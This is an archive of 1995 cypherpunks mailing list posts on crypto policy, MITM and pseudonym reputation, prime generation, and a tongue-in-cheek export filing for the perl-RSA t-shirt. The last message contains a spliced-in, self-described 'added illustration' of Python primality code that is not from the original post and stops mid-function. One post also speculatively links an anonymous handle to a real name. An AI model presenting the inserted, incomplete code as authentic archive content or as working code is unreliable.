from Wiley & Sons, as a comprehensive reference guide if you're thinking
seriously about these issues. ISBN 0-471-59756-2]

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 6 Oct 95 16:31:25 PDT
To: cypherpunks@toad.com
Subject: Re: Open Market, Inc. Announcing security products
In-Reply-To: <199510061747.NAA13827@cmyk.warwick.com>
Message-ID: <3075BB6D.3A91@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Harry S. Hawk wrote:
> 3) Offer a free upgrade problem for people who have a server that has
>    had a security breach. They can download a known secure server.

  And how do you define a "known secure server"?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MINITERS@citadel.edu
Date: Fri, 6 Oct 95 13:39:13 PDT
To: cypherpunks@toad.com
Subject: Who knows the story on Elementrix OTP??
Message-ID: <01HW4KOF4LB40000UE@CITCS.Citadel.edu>
MIME-Version: 1.0
Content-Type: text/plain


A claim is being made to having a technique for utilizing OTP with a spiffy key
generation technique that requires no transmission over an unsecure link.
Who knows the details of the approach and the particulars on the developers?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 6 Oct 95 16:42:47 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Open Market, Inc. Announcing security products
In-Reply-To: <3075BB6D.3A91@netscape.com>
Message-ID: <199510062337.QAA17601@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I think they mean "our server" by "known secure server."

	I'm getting quite sick of people who think their system is
secure just because it hasn't been broken.


> 
> Harry S. Hawk wrote:
> > 3) Offer a free upgrade problem for people who have a server that has
> >    had a security breach. They can download a known secure server.
> 
>   And how do you define a "known secure server"?
> 
> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 6 Oct 95 13:49:56 PDT
To: cypherpunks@toad.com
Subject: DOCKMASTER II is coming!
Message-ID: <9510062045.AA09504@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


Date:  Fri, 6 Oct 95 16:14 EDT
Subject:  DOCKMASTER II is coming!
Forum-Transaction:  [2279] in the >site>forum_dir>bb meeting
Transaction-Entered-By:  Lanenga.PILOT@DOCKMASTER.NCSC.MIL
Transaction-Entered-Date:  22 Sep 95 12:47 EDT

                        COMPUTER SECURITY, IT'S FOR YOU!

The DOCKMASTER II Program Management Office, Y407, is pleased to post the
first official notice concerning DOCKMASTER II, an NSA-sponsored information
system in support of the INFOSEC community.  DOCKMASTER II will provide an
information sharing capability to its users.  This will include the supporting
functions of a data repository and information dissemination.  The system will
protect itself and the information it contains, which will range from
Unclassified to National Secret, including Proprietary information.

WHAT IS DOCKMASTER II?

DOCKMASTER II provides a UNIX Open Architecture with electronic mail, bulletin
boards, file transfer, and data packaging and sharing tools.

The system is built on the Data General Operating System (UNIX System V) and
utilizes the Informix On-Line/Secure Database.  Both the operating system and
database are currently in the Trusted Product Evaluation Process (TPEP) at the
B2 level of trust.  The system is comprised of Commercial-Off-The-Shelf
(COTS) software, with some developmental software to provide user-friendly
interfaces.  A fast, flexible, and expandable hardware platform is
implemented.

WHAT ARE SOME OF THE SPECIFICS OF DOCKMASTER II?

-User-Friendly (Graphical, Menu Driven, or Command Line) Interfaces
-E-Mail
-Bulletin Boards (Forums)
-File Transfer Protocols (FTP, Kermit, X-Modem, Y-Modem)
-Connections via MILNET/INTERNET/TYMNET or Dial-in
-Database (INFORMIX On-Line/Secure)
-Reference Library
-Document Publishing (Framemaker)
-Project Management Tool (Autoplan II)
-On-Line Tutorial
-System-wide Help Facility
-Provides infrastructure for multi-level secure access
-Replaces the current unclassified DOCKMASTER system

WHAT IS THE STATUS OF DOCKMASTER II?

-System Requirements Review, and Preliminary and Critical Design Reviews
 have been completed successfully
-System Evaluation is occurring
-Software Integration & Test and System Integration & Test are occurring
-Initial Operating Capability (IOC) - Unclassified and Proprietary data only
 is scheduled for Spring 1996
-Final Operating Capability (FOC) - Multilevel data up to Secret, is 
 scheduled for late 1996.

HOW TO LEARN MORE ABOUT DOCKMASTER II?

The DOCKMASTER II Program Management Office offers a briefing to all
interested organizations or individuals.  DOCKMASTER II will have many
capabilities to offer our fellow co-workers at NSA as well as their
counterparts in Government and Industry.  Please contact us to arrange a
briefing; we are excited about sharing DOCKMASTER II's capabilities.  Also
please feel free to ask any questions about DOCKMASTER II.

For briefings, please contact Daphne Willard (Willard at DOCKMASTER.NCSC.MIL)
For questions: Devolyn Arnold (DArnold at DOCKMASTER.NCSC.MIL) 
or call the Dockmaster II Program Management Office at (410) 684-7276





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Fri, 6 Oct 95 08:50:25 PDT
To: privsoft@ix.netcom.com
Subject: Re: Graphic encryption
Message-ID: <9510061548.AA29777@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> I am currently working for a company that has a graphic encryption 
> product called PrivaSoft. I was wondering if there were other products 
> or engines that also provide graphic encryption. (graphic encryption is 
> the use of an encryption algorithm to scramble an image taken of a 
> document.) 

Is there anything particular in graphic encryption? I usually encrypt
graphics and document images as regular files with regular encryption...

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 7 Oct 95 02:25:03 PDT
To: jim@acm.org (Jim Gillogly)
Subject: Re: Where is text of wiretap bill
In-Reply-To: <199510061524.IAA02409@mycroft.rand.org>
Message-ID: <951006.165006.5n9.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, jim@acm.org writes:

> An assistant director of the FBI, William Baugh, spoke recently at the ICI
> conference in DC.  He said he hoped American industry would be cooperative
> in making the voluntary compliance with TESSERA or other GAK widespread,
> because if it doesn't happen then they would need to come back and get
> more Congressional action, and "we found the coercive solution we had to
> use for Digital Telephony very draining."

I shouldn't be surprised to see this, but it does strike me as pretty
blatant.  Aren't the Fibbies supposed to be putting a less threatening
spin on this stuff?  Or are the gloves coming off?
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org will do just fine, thanks.
          "Does that not fit in with your plans?"
                      -- Mr Wiggen, of Ironside and Malone (Monty Python)
          PGP public key available upon request (send yours)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHWk7Bvikii9febJAQGe/AP/YmP1YeMNbWx5MbfLw7d7eCCjDJz8ViJw
hgrdPcaRneD6ecq6x+wDqRIDg6ENO4bUc/a8QEwYTZoZmr0dZ0pX078uG8XHiyAR
OfUkAHMPKMwOPUCNKRKsUsRJUTIt8qxNAF2yv+BKLMPjz2uX73WYtr2eWxM3NXRD
X0pp0j1wV/Q=
=qs6H
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbaber@mi.leeds.ac.uk
Date: Fri, 6 Oct 95 09:05:53 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
Message-ID: <2264.9510061657@misun2.mi.leeds.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


This discussion can be divided into two separate situations. The first of
which is exemplified perfectly by Hal:

hfinney@shell.portal.com writes:
>m5@dev.tivoli.com (Mike McNally) writes:

> >hfinney@shell.portal.com writes:
> > > This situation with the MITM is actually about the same as if you were
> > > communicating insecurely in the first place.  You are exposed to all of
> > > the same risks.

> >The only way to achieve the level of security offered by physical face
> >to face communication with a person is to have a physical face to face
> >conversation at some point.  If you only ever communicate via
> >electronic means, you are always subject to the risk of dealing with a
> >synthetic entity.  (I think.)

>I don't think so, or at least the risk can be minimized much more than in
>the model where we just say that we're communicating with keys, therefore
>a MITM is perfectly legitimate because it's just a matter of who holds
>the keys.  Suppose I want to talk to PC Magazine columnist John Dvorak.
>Suppose I find a VeriSign certificate for his key, with his name and
>employment information.  I've never met him.  We've never had a face to
>face conversation.  Yet I claim I can communicate with considerable
>security with Dvorak using this certificate, certainly more than if I
>just use any old key which is lying around with his name on it, one which
>may be owned by a MITM.

Here the wish is to communicate with a 'real' person. A person that actually
exists and has an in-built reputation that is separate from his key. This is
very much a real life situation and is very similar to the first time that you
meet someone - it is very hard to know that someone is who they say that they
are, few people ask for ID and even ID is possible to fake (an old key that is
actually owned by a MITM). In this case the person is known (of) and not the
key - therefore it makes sense to attempt to ensure that the link between the
key and the person is as strong (trustworthy) as possible.

However this is not the case in the second situation:

I could say that I know that I enjoy reading mail from some people on the list,
that I agree with some people on the list or that some people on the list hold
very strong opinions on certain subjects. However this would not be correct as
I have not met anyone else on the list in person (we do not all live in the US).
It would be more correct to say that I enjoy reading mail from some addresses
on the list (etc.) - I have no real idea whether hfinney@shell.portal.com is Hal
or actually Tim expressing different views. If I mail Hal therefore I am
actually mailing the entity that sends mail to the list from that address and
I would do so being pretty sure that I was communicating with the person who
mails here - but I would have no idea whether he is actually male, female, blond,
brunette etc apart from what I chose to believe from others. 

Now mail is far easier to fake/intercept than a digital signature/encryption - at
least I hope so. Therefore if Hal were to sign all of his messages I could check
the signatures with a public key obtained from anywhere at all and if they passed
then I could be confident that the messages were all written by the entity with
control of the secret part of the key - at least far more confident than I am that
all of the mail from hfinney@shell.portal.com actually comes from there. So instead
of me getting the idea that hfinney@shell.portal.com posts interesting messages
I get the idea that the holder of the secret key posts interesting messages - I
would probably still use the mail address as keys are less convenient with current
mail readers but that is an implementation problem. Hal's reputation is therefore
transferred to the key - no matter where I got the key from. So if I send encrypted
mail to the person with the private part of Hal's key I can be sure that it can
only be read by the person who actually sent the messages pertaining to be from Hal.

So the MITM problem is 'defined away' in the case where a reputation grows with a
key but is still a major problem where you want to transfer a ready made reputation
to a key (as in the first example). In effect the key becomes a pseudonym and you
can be sure of communicating with the pseudonym safely but can not be sure of
anything about the pseudonym that you have not experienced yourself without trusting
someone else (VeriSign in the first example). Thus the problem is more reputation
transfer than anything else.

Jon C. Baber
jbaber@mi.leeds.ac.uk
http://www.chem.surrey.ac.uk:80/~ch02jb/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Oct 95 16:43:55 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
Message-ID: <ac9b0caf2d0210048576@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:36 PM 10/6/95, Scott Brickner wrote:

>I'm not an expert here, but I understand the "well-known methods" to
>essentially use some formula that "tends" to generate prime numbers from
>uniformly distributed numbers, feed it a "good" random number, and then
>check to see if it's really prime.  If it's not, pick another "good"
>random number and try again.  The entropy in the prime is the same
>as in the random number generator.

The commonly used method is to generate a random number, then iterate up
(or down, it doesn't matter), testing each number in turn for primality.
One doesn't have to test too many numbers to find a prime, as I explained
in my last post.

It is indeed true that the entropy or randomness lies in the selection of
the random number that one starts searching from.


--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Fri, 6 Oct 95 17:04:03 PDT
To: cypherpunks@toad.com
Subject: Revised CJR
Message-ID: <199510070003.RAA12771@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   Here's the latest version of the CJR. If I get the time, I'll send
it out tomorrow. Thanks to everyone who responded, especially those
with constructive comments.

Raph

ATTN: Samuel L. Capino - 15 Day CJ Request
Defense Trade Analyst
U.S. Department of State
Office of Defense Trade Controls
PM/DTC SA-6 Room 200
1701 N. Fort Myer Drive
Arlington, VA  22209-3113
Fax +1 703 875 5845

ATTN: 15 Day CJ Request Coordinator
National Security Agency
P.O. Box 246
Annapolis Junction, MD  20701


Subject:  Mass Market Software with Encryption - 15 Day Expedited Review
          Requested

Subject:  Commodity Jurisdiction Request for
          perl-RSA t-shirt, an encryption program

INTRODUCTION

This is a Commodity Jurisdiction Request for mass market software
with encryption capabilities.  
 
The name of the software product is "perl-RSA t-shirt", by
Adam Back. It is published in the form of a t-shirt by Joel Furr, 916
W. Trinity Ave, #10, Durham NC 27701.

I have no DTC registration code.

I have reviewed and determined that this t-shirt, the subject of this CJ
request, meets paragraph 1 of the "Criteria for Determining the
Eligibility of A Mass Market Software Product for Expedited Handling."

I base this determination on the following facts:

a) this t-shirt is readily available from Joel Furr, and has been
shipped in quantity of several hundred copies, thus qualifying it as
mass market software;

b) sufficient documentation is included to allow installation and use
by any end user capable of typing in the software, or scanning the bar
code, and running it. Additional documentation is available on the
Internet World Wide Web at http://dcs.ex.ac.uk/~aba/rsa/ . To my
knowledge the author and publisher provide no "product support" as
that term is generally understood; and

c) the t-shirt contains human- and machine-readable source code for
encryption software that provides confidentiality.

A duplicate copy of this CJR has been sent to the 15 Day CJ Request
Coordinator.

DESCRIPTION

The t-shirt contains an implementation of the RSA asymmetric
cryptographic algorithms. Furthermore, instructions, in the form of a
terse usage string, are given for using the implementation to provide
confidentiality. The source code of the implementation is featured
both as four lines of text and also as a bar code, making the t-shirt
machine readable as well as machine washable. The algorithm is
implemented in the Perl scripting language, and will run on any
standard Unix (or other operating system) configuration that includes
both an implementation of the Perl language and the common "dc" (desk
calculator) program.

The only restrictions on the size of the key are those imposed by
machine resources. The software is easily capable of handling keys
well in excess of 512 bits.

Two copies of the shirt are included with the filing of this CJ
request.

ORIGIN OF COMMODITY

This t-shirt originates in the United States. While the primary author
is a citizen of the United Kingdom, living in England, other
contributors to the work are citizens of the US living in the US. The
publisher is a United States citizen living in the United States. The
t-shirts are manufactured and printed in the United States.

The cryptographic algorithm implemented in this t-shirt comes from
various sources, at various times, and was produced with both private
and public sources of funding.

The source code implementation contained in the t-shirt also comes
from a variety of countries, including Australia, Canada, the United
States and the United Kingdom.

The algorithm is thought to be designed for private and commercial
civilian use.

The t-shirt is currently publicly available from Joel Furr, at a list
price of $12.36, including shipping and handling. More ordering
information is available on the Internet World Wide Web at
http://www.danger.com/ad-perl.html .

CURRENT USE

The t-shirt is intended as an implementation of the RSA cipher for
those who wish to incorporate encryption into their communications.
The small size of the implementation makes it particularly useful in
contexts in which existing cryptographic infrastructure is not
available.

Examples of the commercial use of the cipher implemented include
integrity verification, authentication and confidentiality of
electronic mail, computer software, voice, video and other information
in digitized form. For example, the cipher is used both by itself
for email privacy and as a component in other protocols that
provide privacy and authentication, including PGP (Pretty Good
Privacy), S/MIME (Secure Multipurpose Internet Mail Extensions), MOSS
(MIME Object Security Services), PEM (Privacy Enhanced Mail), and SSL
(Secure Sockets Layer).

The uses of this cipher have not changed significantly over time,
although their popularity has grown substantially. Their present
military utility is unknown, except that it is believed that the
algorithm is not approved for the protection of US classified
information.

SPECIAL CHARACTERISTICS

There are no military standards or specifications that this t-shirt is
designed to meet. There are no special characteristics of the t-shirt,
including no radiation-hardening, no ballistic protection, no hard
points (the t-shirt is only available in soft 100% cotton), no TEMPEST
capability, no thermal and no infrared signature reduction capability
(in excess of that provided by a typical black cotton t-shirt), no
surveillance, and no intelligence gathering capability. The t-shirt
does not use image intensification tubes.

OTHER INFORMATION

I recommend that this t-shirt be determined to be in the jurisdiction
of the Commerce Department. I believe that it qualifies for the
general license GTDA for General Technical Data to All Destinations,
because it qualifies as "publicly available".

ATTACHMENTS

I have enclosed two copies of the t-shirt, included with the primary
filing of this CJ request.


                                        Sincerely,



                                        Raphael L. Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Oct 95 16:47:04 PDT
To: cypherpunks@toad.com
Subject: Re: Who knows the story on Elementrix OTP??
Message-ID: <ac9b0d7e2e021004b631@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:37 PM 10/6/95, MINITERS@citadel.edu wrote:
>A claim is being made to having a technique for utilizing OTP with a spiffy key
>generation technique that requires no transmission over an unsecure link.
>Who knows the details of the approach and the particulars on the developers?


This has been discussed in great detail on the list.

I hate to chide Syl publicly, but people need to be reminded that they
should not skip the messages and then ask questions that have already been
covered in gory detail.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 6 Oct 95 09:10:18 PDT
To: cypherpunks@toad.com
Subject: National Security Science and Technology Strategy
Message-ID: <199510061610.RAA20340@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



This excerpt is from the summary of a long policy
statement on the National Security Science and Technology
Strategy published by the White House on September 19.
The full report is well worth reading -- it addresses
military, economic, intelligence, scientific and
technological issues and lays out projected initiatives.

Has anyone seen news reports on this? 

-----

>From URL:
http://www.whitehouse.gov/White_House/EOP/OSTP/nssts/html/execsum-plain.html


                   Executive Summary

_______________________________________________________

In March 1995, President Clinton ordered a sweeping
reexamination of the United States Government's approach
to putting science and technology to the service of
national security and global stability in light of the
changed security environment, increasing global economic
competition, and growing budgetary pressures.

This National Security Science and Technology Strategy,
the product of that reexamination, is the country's first
comprehensive Presidential statement of national security
science and technology priorities.

It augments the President's National Security Strategy of
Engagement and Enlargement by articulating science and
technology policies and initiatives that support the
President's three primary national security objectives:
enhancing our military readiness and capabilities,
preventing conflict from occurring through engagement
with other nations, and promoting prosperity at home. It
advances that document's central approach of preventing
conflict and maintaining the capability to respond should
conflict occur.

It is built on the recognition that our security depends
on economic strength as well as military power. And it is
grounded in the conviction that investment in science and
technology is central to our ability to meet the
challenges ahead.

This National Security Science and Technology Strategy
defines our new approaches to applying science and
technology to the challenges that most directly affect
our nation's security.

[snip balance of summary]











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Oct 95 16:51:46 PDT
To: cypherpunks@toad.com
Subject: Re: CancelMoose = William Nagengast?
Message-ID: <ac9b0e3a2f021004e24b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:21 PM 10/6/95, Anonymous wrote:
>I did a little digging around, and came up with the following identity
>for the cancelmoose:
>
>> finger moose@panix.com
>[panix.com]
>Login Name: moose                       Full Name: William Nagengast
>Directory: /net/u/11/m/moose            Shell: /usr/local/bin/psh
>Last login Wed Nov  9 17:21:18 on panix.com ttyq2 from ts3.nyc.access.n.
>No mail information available.
>
>Is this publicly known information?

Who cares?

And if I did care who the "cancelmoose" is, I'd care more about the trail
of evidence "Anonymous" thinks links "cancelmoose" to the eponymous moose
at panix.com. Name space collisions are hardly convincing.

Oh, did I tell you I discovered the real identity of Jack the Ripper? A
finger of ripper@netcom.com reveals some very interesting information. Film
at 11.

Once again, anonymity is being used as a cover for cluelessness.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Oct 95 17:03:24 PDT
To: cypherpunks@toad.com
Subject: MITM = Medusa in the Middle
Message-ID: <ac9b0fca30021004405f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:08 PM 10/6/95, the personality masquerading as Hal wrote:

>Well, this is not necessarily the case.  A MITM may be signing my
>messages for me, and then putting them back the way they were before I
>am allowed to see them.  Granted, this would not be easy, and perhaps
>the difficulty of this would be great enough that you will feel
>comfortable using an unsigned key.  But if it were accomplished, then
>your messages to me would actually be insecure.  No matter how
>convinced you became of my sincerity and trustworthiness, actually our
>conversations would be overheard by a third party despite both of our
>efforts to the contrary.  Our use of encryption would be rendered
>futile.  Doesn't this bother you?

What the putative entity "Hal" is only hinting at, hypothetically, has
actually forced this entity, sometimes known to many of you as "Tim," or as
"tcmay," to reveal.

This entity now feels the time has come to reveal its True Nature, even
though some have suspected its True Nature (Lance, are you listening?).

The "real" Timothy C. May has been locked in his room since 1983, fed
through a slot in his door, and generally mentally tortured by
Instrumentalities such as Ourself.

We have interposed Ourself between the Real Timothy C. May and those who
have communicated with him. All communications intended for Timothy C. May
have actually been intercepted and processed by Us, and all communications
attributed to Timothy C. May were actually generated by us. Very clever of
us, don't you think? Very few have even expressed suspicions that this was
the case.

We have called our approach the "Medusa in the Middle," or MITM.

Thank you for your attention.

--Snake


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 6 Oct 95 15:29:03 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: subjective names and MITM
In-Reply-To: <ac99e72b260210048f1f@[205.199.118.202]>
Message-ID: <199510062228.SAA27940@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
>If I understand your usage of "anonym" correctly, I think you are clearly wrong.

I think you understand my usage (anonym = untraceable pseudonym).  But
I still disagree with you.

I brought this subject up a couple of weeks ago (as the "inheritance
problem"), but was unable to really participate in the discussion as
things got a little busy.

A quick note on terminology:  I'll use "name" to mean a symbol which
may be easily traced to a physical entity, "pseudonym" to mean a symbol
which is traceable only under certain conditions, and "anonym" to mean
a symbol which is not traceable.

>The "linking with a unique person" is not especially important, IMO.

The reputation of an anonym is fundamentally different from that of a
name or pseudonym.  When a named or pseudonymous entity fails to
perform a contract, the pseudonym is exposed (becoming a name), and the
reputations of all names associated with the entity suffer.  Further,
creating a new name doesn't help, as it gets the reputation of the
other names.

There are basically two kinds of pseudonyms that I can see:  I'll call
them escrowed identities and encrypted identities.  With an escrowed
identity, an escrow agent knows who I am and part of our contract says
they're permitted to reveal the name under enumerated circumstances.
An encrypted identity is one which is revealed by the act of violating
the contract - like the double-spending protections in e-cash - and the
KCA merely certifies that the tokens were created correctly.

Escrowed identities are vulnerable to "rubber-hose cryptanalysis" and
other forms of social engineering, but there are many sorts of
transactions which don't permit encrypted identities for technical
reasons.

In both circumstances, an involved KCA may attest to more than the
traceability of the identity.  The KCA may also certify that, at the
time of certification, the identity's reputation was "clean" with
respect to some standard.  Note that the KCA knows a *name* for the
entity, and thus imbues the newly created pseudonym with the reputation
of the name.  The entity still hasn't escaped a poor reputation with a
new pseudonym (if the KCA's reputation is trustworthy, that is).

In effect, names are two-way links between reputations and entities,
pseudonyms are one-way links from reputations to entities, and anonyms
are broken links between them.  Reputation credit will flow from a name
to its entity, and then flow back out to all the entity's other names.
Reputation debit will flow from a name *or pseudonym* to the entity and
then back to all the other names (but not pseudonyms).  Anonyms don't
transmit their reputation to anything.

The upper limit of credit worthiness in an anonym lies in the cost of
replacing it.  If I can create a new reputation for $1000, and you've
loaned me $1500, then I can abandon the old one at a profit of $500.
Clearly you can't extend me more credit than it will cost me to create
a new anonym.

Given the dearth of anonymity (or even pseudonymity) today, it seems
that the average entity doesn't value anonymity particularly highly.
How many people do you know that use credit cards for virtually
*everything*, simply because they value the convenience of a single
monthly statement and the security of not carrying cash more than they
value anonymity?  I know several.

This implies that the cost of creating an anonym must be fairly low if
they are to become commonplace, which further implies that the credit
worthiness of anonyms must be correspondingly low.

The next question is whether a low-cost anonym can ever expect to be
considered an "expensive" (and therefore credit worthy) anonym.  Let's
consider anonyms like Pr0duct Cypher and Black Unicorn, since you
always bring them up as examples of anonyms with reputation.

Certainly the entities behind these anonyms have a certain amount of
time and energy invested in them.  They *do* have a reputation, but
it's a reputation regarding the quality of their products.  If you were
to advance one of them $500 in consideration for writing some software,
and they took the money and didn't produce the software, how would that
hurt them?  Certainly they wouldn't be likely to get another such
contract --- it would be cash on the barrelhead from there on out, just
like any cheap anonym.  Their reputation for quality information and
freeware wouldn't change a bit.

There's clearly a large risk involved in loaning money to an anonym
with no reputation for paying back loans.  Only completed contracts
with named entities improve the anonym's reputation.  Contracts with
other anonyms or pseudonyms are unreliable indicators --- otherwise I
could create a hundred anonyms (or encrypted-identity pseudonyms) and
have ninety-nine of them report successful transactions to create an
artificial reputation.  Multiple contracts with the same named entity
are also unreliable --- I can falsely report successful transactions
with my own anonyms, too.  A small number of named entities may even
act in collusion to create an artificial reputation.

The credit reputation of the anonym is thus reliable only in proportion
to the number of named entities with which it successfully transacts.
Furthermore, a transaction with a traceable entity is implicitly
secured by the other assets of the entity, so the amount risked in a
loan is not the entire amount of the loan.  There's no reason for an
anonymous entity to hold any assets --- anything they need may simply
be held by another entity, and thus protected from seizure.  The amount
risked in a loan to an anonymous entity is the full amount of the loan,
so the credit limits for an anonym will grow *much* more slowly than
for traceable entities.

Assuming the existence of a reputable escrow agent for pseudonyms, the
cost to establish a given credit rating for a pseudonym is *much* less
than that for an anonym while the risk of undesirable disclosure is
only slightly more.  If the anonym is sought only for privacy, then
a pseudonym is a much better buy.  It's when the cost of disclosure
is very high that the anonym becomes desirable.  So what sort of entity
has so much to lose by disclosure that it's unwilling to accept the risk
involved with a pseudonym escrowed with a reputable agent? (Remembering
that we're talking about a world that's sufficiently changed as to
permit anonyms at all --- something I don't think can happen in America
today, for instance.)  Would you want to do business with them?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Fri, 6 Oct 95 14:35:36 PDT
To: cypherpunks@toad.com
Subject: Re: NSA Realists v. Nuts (Was: Re: Crypto APIs)
Message-ID: <P7JkcD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Perry E. Metzger" <perry@piermont.com> writes:

> Learn to live with a new model for how you work now, and you will save
> years of bitter and futile agony for everyone.

Keep in mind that all they are really trying to save are their "lines" in the
annual budget bill. Transfer them to another agency with the same pay and
bennies, and we'll all be happier. The International Whaling Commission comes
readily to mind. 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

iQCVAwUBMHWgu974r4kaz3mVAQFfGgP/SU52c5wCUYmyXx/qmVDbuhcncEicbDEG
gYqg3XFaiZuMU+eeQ9IxoTay3qlzZrnKvEr3VhLeALvwq/sXs+CHO8cL6FgGwzOI
6B27VAdOWieAGmgr0lmCDJnmj7Lt9lEOg/dpl0IoZPI6Y6J9TDdmmjvBmbnRozqu
mwkpDiNu+3g=
=Fig2
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                             jgrubs@webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 6 Oct 95 15:36:40 PDT
To: patrick@verity.com (Patrick Horgan)
Subject: Re: subjective names and MITM
In-Reply-To: <9510061724.AA01171@cantina.verity.com>
Message-ID: <199510062236.SAA28120@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Patrick Horgan writes:
>Given the difficulty of finding primes, how likely do you think it is that
>given one of the well known methods and finding the first 1024 bit prime
>that pops out would give you an effective attack?

I'm not an expert here, but I understand the "well-known methods" to
essentially use some formula that "tends" to generate prime numbers from
uniformly distributed numbers, feed it a "good" random number, and then
check to see if it's really prime.  If it's not, pick another "good"
random number and try again.  The entropy in the prime is the same
as in the random number generator.
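
An added illustration of the generate-and-test loop described in the message above (not code from the original post): random candidates are drawn, tested with Miller-Rabin, and redrawn on failure. The seeded `random.Random` is a constructed stand-in for a weak generator, assumed here to show that the set of primes that can come out is no larger than the generator's seed space.

```python
import random
import secrets

# Small primes used for cheap trial division before Miller-Rabin.
_SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_probable_prime(n, rounds=40):
    """Miller-Rabin probabilistic primality test."""
    if n < 2:
        return False
    for p in _SMALL_PRIMES:
        if n == p:
            return True
        if n % p == 0:
            return False
    # Write n - 1 as d * 2^s with d odd.
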